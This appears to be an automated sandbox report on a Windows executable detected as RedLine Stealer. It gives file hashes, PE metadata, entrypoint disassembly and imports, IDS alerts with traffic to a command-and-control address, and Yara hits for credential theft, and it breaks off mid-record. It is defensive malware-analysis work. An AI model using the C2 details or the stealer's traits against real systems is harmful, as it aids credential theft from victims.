                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.4.0.<./.P.i.d.>.......

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE8AD.tmp.xml

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4521
                                                                                                                                                                        Entropy (8bit):4.423660373002552
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:cvIwSD8zswJgtWI9FBWgc8sqYjP8fm8M4JhOFi+q8aBtdfNwd:uITf2yQgrsqYwJLhtlNwd
                                                                                                                                                                        MD5:7B0C03096324CD48C67D527D0204126D
                                                                                                                                                                        SHA1:6E3986447CF7AB690A5E6ABCCE08B110FDFF7F13
                                                                                                                                                                        SHA-256:325FFFF9B3CFCDA929C98430A946C0D4703C27D3169040296957226BA8D162F6
                                                                                                                                                                        SHA-512:8A15EA240D7A20FC8BF9E3D298B4D4DC307E4CD0A4C0DE207A05F004A700D1E9C4815A311923E4283B475423939528229B5C0A56AD672F0A8C885644968CA323
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1770553" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2843
                                                                                                                                                                        Entropy (8bit):5.3371553026862095
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1qHje:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxU
                                                                                                                                                                        MD5:75BC6DB42CE4C37482926043D9B80BC9
                                                                                                                                                                        SHA1:700BDF1D18804FBE60EB0318B290C37CDC60EA41
                                                                                                                                                                        SHA-256:15F15BDEB42AD40DBCB6BB9064C33B51CB43EDB99820EDE647350BE604AAF58A
                                                                                                                                                                        SHA-512:26E15E546BBD6518265BAC343F952E75B30C7927143D293780F456A5B44C1E1B6B7D074DF00BC6328D23E52FE9E3F8850A879B129C35F47B0ED864E9C640BA4F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                        Entropy (8bit):2.663532754804255
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:gQdcXW:gQn
                                                                                                                                                                        MD5:5F702714045C206E93012159054928D0
                                                                                                                                                                        SHA1:3AEF30FD196AE230CD4C194006A3185524EFC82A
                                                                                                                                                                        SHA-256:A6706758CED31780EA9392DDDFE62CF54D9D03EED69FCCBB00234AF431892043
                                                                                                                                                                        SHA-512:AC25D23590C1907E726362F5C752022A0EC7F1D5E10B7A6CEB500CB6A685AACC2B5A8340EFB4AE0B30B186A17395BB7C682151F2389D765F1F890842B5884666
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:76587687123

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.233138744312905
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:file.exe
                                                                                                                                                                        File size:355328
                                                                                                                                                                        MD5:76b726f03046fc48fcc93701c14a3894
                                                                                                                                                                        SHA1:3f1dec6167f3e52c4a723095bff999aed31c71c3
                                                                                                                                                                        SHA256:983b19f3d65f37400eeb404fd838e322041fc26335ed14e08d29addbb87fcea9
                                                                                                                                                                        SHA512:82adb5bb73b094bc71179b8273d1b4cfcd58562edb396bf0aa029b70098ba982a5a7d8a4edf179400523afba8d275c1ddffcbdf061a833545f1ce4d31aa12f8a
                                                                                                                                                                        SSDEEP:6144:Sy1R2biwZ3RIcq5KlVwOTi4bBI8UAOdJYJfPfc+freo5JSjZY85U:Sy1RqiwZ3RIcq5d/knL5zr
                                                                                                                                                                        TLSH:F474CF40B5D3DA72D8B3543609E0DB75897DB8200F705AFF67E4476B4E202C3A9B2A79
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... J..sJ..sJ..s^..rG..s^..r...s^..r\..s...r[..s...r^..s...r...s^..rI..sJ..s...s...rK..s...rK..sRichJ..s................PE..L..

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x408d22
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x636954D1 [Mon Nov 7 18:56:17 2022 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:6
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:e2a07bb4b81e6c6d0f72670722ee7e56

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        call 00007F7774ABC519h
                                                                                                                                                                        jmp 00007F7774ABBFC9h
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                                                                                        push esi
                                                                                                                                                                        mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                        add ecx, eax
                                                                                                                                                                        movzx eax, word ptr [ecx+14h]
                                                                                                                                                                        lea edx, dword ptr [ecx+18h]
                                                                                                                                                                        add edx, eax
                                                                                                                                                                        movzx eax, word ptr [ecx+06h]
                                                                                                                                                                        imul esi, eax, 28h
                                                                                                                                                                        add esi, edx
                                                                                                                                                                        cmp edx, esi
                                                                                                                                                                        je 00007F7774ABC16Bh
                                                                                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                                        cmp ecx, dword ptr [edx+0Ch]
                                                                                                                                                                        jc 00007F7774ABC15Ch
                                                                                                                                                                        mov eax, dword ptr [edx+08h]
                                                                                                                                                                        add eax, dword ptr [edx+0Ch]
                                                                                                                                                                        cmp ecx, eax
                                                                                                                                                                        jc 00007F7774ABC15Eh
                                                                                                                                                                        add edx, 28h
                                                                                                                                                                        cmp edx, esi
                                                                                                                                                                        jne 00007F7774ABC13Ch
                                                                                                                                                                        xor eax, eax
                                                                                                                                                                        pop esi
                                                                                                                                                                        pop ebp
                                                                                                                                                                        ret
                                                                                                                                                                        mov eax, edx
                                                                                                                                                                        jmp 00007F7774ABC14Bh
                                                                                                                                                                        push esi
                                                                                                                                                                        call 00007F7774ABC9C5h
                                                                                                                                                                        test eax, eax
                                                                                                                                                                        je 00007F7774ABC172h
                                                                                                                                                                        mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                        mov esi, 00455E2Ch
                                                                                                                                                                        mov edx, dword ptr [eax+04h]
                                                                                                                                                                        jmp 00007F7774ABC156h
                                                                                                                                                                        cmp edx, eax
                                                                                                                                                                        je 00007F7774ABC162h
                                                                                                                                                                        xor eax, eax
                                                                                                                                                                        mov ecx, edx
                                                                                                                                                                        lock cmpxchg dword ptr [esi], ecx
                                                                                                                                                                        test eax, eax
                                                                                                                                                                        jne 00007F7774ABC142h
                                                                                                                                                                        xor al, al
                                                                                                                                                                        pop esi
                                                                                                                                                                        ret
                                                                                                                                                                        mov al, 01h
                                                                                                                                                                        pop esi
                                                                                                                                                                        ret
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        cmp dword ptr [ebp+08h], 00000000h
                                                                                                                                                                        jne 00007F7774ABC159h
                                                                                                                                                                        mov byte ptr [00455E30h], 00000001h
                                                                                                                                                                        call 00007F7774ABC7B3h
                                                                                                                                                                        call 00007F7774ABE9E7h
                                                                                                                                                                        test al, al
                                                                                                                                                                        jne 00007F7774ABC156h
                                                                                                                                                                        xor al, al
                                                                                                                                                                        pop ebp
                                                                                                                                                                        ret
                                                                                                                                                                        call 00007F7774AC67B2h
                                                                                                                                                                        test al, al
                                                                                                                                                                        jne 00007F7774ABC15Ch
                                                                                                                                                                        push 00000000h
                                                                                                                                                                        call 00007F7774ABE9EEh
                                                                                                                                                                        pop ecx
                                                                                                                                                                        jmp 00007F7774ABC13Bh
                                                                                                                                                                        mov al, 01h
                                                                                                                                                                        pop ebp
                                                                                                                                                                        ret
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        cmp byte ptr [00455E31h], 00000000h
                                                                                                                                                                        je 00007F7774ABC156h
                                                                                                                                                                        mov al, 01h

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3185c0x28.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x570000x1c58.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x2fe0c0x1c.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2fe280x40.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x240000x13c.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x22d220x22e00False0.5762768817204301data6.6605774583744495IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x240000xdf720xe000False0.5242222377232143data5.554648741907312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x320000x249300x23c00False0.7996271306818182data7.495127080621036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .reloc0x570000x1c580x1e00False0.7291666666666666data6.3994808113416175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        KERNEL32.dllGetCurrentProcess, CreateThread, GetModuleHandleA, GetProcAddress, MultiByteToWideChar, FreeConsole, CreateFileW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, TerminateProcess, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                        192.168.2.6194.110.203.10049721327962850027 11/07/22-20:02:48.733611TCP2850027ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        194.110.203.100192.168.2.632796497212850353 11/07/22-20:02:51.076682TCP2850353ETPRO MALWARE Redline Stealer TCP CnC - Id1Response3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        192.168.2.6194.110.203.10049721327962850286 11/07/22-20:03:07.287990TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4972132796192.168.2.6194.110.203.100

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Nov 7, 2022 20:02:48.070909023 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:02:48.119203091 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:02:48.119393110 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:02:48.733611107 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:02:48.782188892 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:02:48.870331049 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:02:51.028397083 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:02:51.076682091 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:02:51.181005001 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:01.529644966 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:01.595479012 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:01.595535994 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:01.595587015 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:01.595690012 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:01.650660038 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:03.444371939 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:03.494756937 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:03.519723892 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:03.568541050 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:03.619524002 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.190699100 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.240565062 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:05.291585922 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.463870049 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.512433052 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:05.557214022 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.610408068 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.658844948 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:05.713537931 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.787441969 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.835834026 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:05.850558996 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.898813963 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:05.917280912 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:05.967777014 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:06.010380983 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:06.177527905 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:06.226139069 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:06.227144957 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:06.276046991 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:06.652749062 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:06.701364040 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:06.702847958 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:06.752557039 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:06.771147013 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:06.819082022 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:06.869879961 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:06.944365978 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:06.992187977 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:06.992892981 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:07.041780949 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:07.084103107 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:07.132455111 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:07.138436079 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:07.187535048 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:07.190057993 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:07.238189936 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:07.239080906 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:07.287101984 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:07.287990093 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:07.337461948 CET3279649721194.110.203.100192.168.2.6
                                                                                                                                                                        Nov 7, 2022 20:03:07.385507107 CET4972132796192.168.2.6194.110.203.100
                                                                                                                                                                        Nov 7, 2022 20:03:07.485074043 CET4972132796192.168.2.6194.110.203.100

                                                                                                                                                                        Statistics

                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:20:02:16
                                                                                                                                                                        Start date:07/11/2022
                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        Imagebase:0x9f0000
                                                                                                                                                                        File size:355328 bytes
                                                                                                                                                                        MD5 hash:76B726F03046FC48FCC93701C14A3894
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.298695211.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.295452062.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.256237407.0000000000892000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:1
                                                                                                                                                                        Start time:20:02:16
                                                                                                                                                                        Start date:07/11/2022
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6da640000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:20:02:21
                                                                                                                                                                        Start date:07/11/2022
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                        Imagebase:0x10d0000
                                                                                                                                                                        File size:98912 bytes
                                                                                                                                                                        MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:20:02:34
                                                                                                                                                                        Start date:07/11/2022
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748
                                                                                                                                                                        Imagebase:0x1030000
                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:20:02:42
